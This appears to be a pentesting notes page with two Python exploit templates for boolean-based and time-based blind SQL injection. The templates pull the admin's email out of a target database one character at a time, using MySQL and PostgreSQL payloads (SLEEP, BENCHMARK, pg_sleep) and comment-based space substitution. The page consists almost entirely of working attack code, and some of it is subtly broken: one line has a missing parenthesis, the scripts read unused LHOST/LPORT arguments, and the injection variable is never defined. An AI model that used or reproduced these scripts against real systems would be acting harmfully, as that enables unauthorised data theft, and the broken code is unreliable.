SQL Injection

Boolean

1
import requests
2
import sys
3
#import urllib3
4
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5
6
def test_injection(url, condition):
7
req = requests.get(url)#, verify=False)
8
9
if condition in req.text: # Check whether the condition has occurred. If so, the injection has been successful.
10
return True
11
else:
12
return False
13
14
def extract(target, injection, query, condition):
15
pos = 1
16
extracted = ""
17
18
while True:
19
20
for ascii_char in range(32, 126): # Iterate over the ascii range of characters.
21
22
if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), condition):
23
extracted += chr(ascii_char)
24
pos += 1
25
break
26
27
else:
28
return extracted
29
30
31
def get_admin_email(target, injection, condition):
32
query = "SELECT email FROM users WHERE username = 'admin'"
33
return extract(target, injection, query, condition)
34
35
def main():
36
if len(sys.argv) != 4:
37
print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
38
sys.exit(-1)
39
40
target = sys.argv[1]
41
lhost = sys.argv[2]
42
lport = sys.argv[3]
43
44
## MySQL
45
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
46
# injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Declare the injection string.
47
## PostgreSQL
48
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
49
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
50
51
extracted_data = get_admin_email(target, injection, "CONDITION")
52
print("[+] EXTRACTED: {}".format(extracted_data)
53
54
55
if __name__ == "__main__":
56
main()
Copied!

Blind Time-Based

1
import requests
2
import sys
3
#import urllib3
4
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5
6
def test_injection(url, time_condition):
7
req = requests.get(url)#, verify=False)
8
9
if req.elapsed.total_seconds() > int(time_condition): # Check whether the condition has occurred. If so, the injection has been successful.
10
return True
11
else:
12
return False
13
14
def extract(target, injection, query, time_condition):
15
pos = 1
16
extracted = ""
17
18
while True:
19
20
for ascii_char in range(32, 126): # Iterate over the ascii range of characters.
21
22
if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), time_condition):
23
extracted += chr(ascii_char)
24
pos += 1
25
break
26
27
else:
28
return extracted
29
30
31
def get_admin_email(target, injection, time_condition):
32
query = "SELECT email FROM users WHERE username = 'admin'"
33
return extract(target, injection, query, time_condition)
34
35
def main():
36
if len(sys.argv) != 4:
37
print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
38
sys.exit(-1)
39
40
target = sys.argv[1]
41
lhost = sys.argv[2]
42
lport = sys.argv[3]
43
44
## MySQL
45
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string.
46
# injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # Declare the injection string. # average 2-3 seconds
47
## PostgreSQL
48
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg_sleep(10))=1%23" # Declare the injection string.
49
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))=1%23" # Declare the injection string.
50
51
extracted_data = get_admin_email(target, injection, NUMBER_OF_SECONDS_TO_DETECT)
52
print("[+] EXTRACTED: {}".format(extracted_data))
53
54
55
if __name__ == "__main__":
56
main()
Copied!
Last modified 1yr ago
Copy link